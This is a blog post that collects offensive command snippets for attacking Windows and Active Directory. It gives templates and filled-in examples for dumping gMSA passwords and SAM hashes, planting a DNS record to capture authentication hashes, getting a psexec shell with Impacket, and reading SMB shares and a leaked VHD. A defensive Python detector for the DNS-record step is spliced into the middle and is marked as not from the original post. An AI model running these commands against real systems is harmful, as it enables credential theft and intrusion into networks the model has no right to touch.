Useful Offensive Snippets

Diddy Doodat
Jul 13, 2022

I will update this post regularly. I am starting with a few of my most commonly used snippets.

Windows

SMB Connect

smbclient -U <USER> //<HOST>/<SHARE>

Example

smbclient -U Diddy.Doodat //pwned.com/Backup

Add DNS record kerberos

Can be used to capture authentication hashes if you identify a service that will look up a specific DNS record.

python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>

Example

python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233
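
A defender-side check for the record creation above, as an added example that is not from the original post: dnstool.py writes the record as a dnsNode object over LDAP, so with directory-service change auditing enabled on the zone the creation shows up as Security event 5137. The JSON export format, the sample events and the machine-account heuristic are assumptions made for this example.

```python
import json
import re

# Constructed sample: Security-log events exported as JSON lines. Field names
# follow Event ID 5137 ("A directory service object was created").
SAMPLE_EVENTS = """\
{"EventID": 5137, "SubjectUserName": "DC01$", "ObjectClass": "dnsNode", "ObjectDN": "DC=fileserver,DC=corp.example.test,CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=example,DC=test"}
{"EventID": 5137, "SubjectUserName": "j.smith", "ObjectClass": "dnsNode", "ObjectDN": "DC=intranet-old,DC=corp.example.test,CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=example,DC=test"}
{"EventID": 5137, "SubjectUserName": "j.smith", "ObjectClass": "user", "ObjectDN": "CN=New Hire,OU=Staff,DC=corp,DC=example,DC=test"}
{"EventID": 4624, "SubjectUserName": "j.smith"}
"""


def split_dn(dn):
    """Split a distinguished name on unescaped commas into (attribute, value) pairs."""
    parts = re.split(r"(?<!\\),", dn)
    return [(a.strip(), v) for a, _, v in (p.partition("=") for p in parts)]


def find_user_created_dns_records(lines):
    """Return (user, record, zone) for dnsNode objects created by non-machine accounts."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 5137 or ev.get("ObjectClass") != "dnsNode":
            continue
        user = ev.get("SubjectUserName", "")
        # Assumption: routine record creation runs under machine accounts
        # (names ending in "$"); a record written by a user account is the outlier.
        if user.endswith("$"):
            continue
        rdns = split_dn(ev.get("ObjectDN", ""))
        # AD-integrated DNS layout: DC=<record>,DC=<zone>,CN=MicrosoftDNS,...
        if len(rdns) < 3:
            continue
        if (rdns[2][0].upper(), rdns[2][1].lower()) != ("CN", "microsoftdns"):
            continue
        hits.append((user, rdns[0][1], rdns[1][1]))
    return hits


if __name__ == "__main__":
    for user, record, zone in find_user_created_dns_records(SAMPLE_EVENTS):
        print(f"dnsNode '{record}' in zone '{zone}' created by user account {user}")
```
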

Dump gMSA password blobs

python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>

Example

python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com

Mount SMB share to Linux Host

mount -t cifs //<HOST>/<SHARE> /tmp/mnt

Example

mount -t cifs //128.11.2.121/Pwned /tmp/mnt

Shell from Linux with Impacket (psexec)

impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>

Example

impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com

Dump SAM hashes on Linux

impacket-secretsdump -sam SAM -system SYSTEM local

Linux

Fix Clock Skew Error

Fix clock skew when trying to connect to or exploit systems where the skew is too great.

sudo ntpdate <NTP SERVER IP>

Example

sudo ntpdate 10.11.1.211

Mount VHD

guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd

Example

guestmount --add leaked.vhd --inspector --ro -v /tmp/vhd
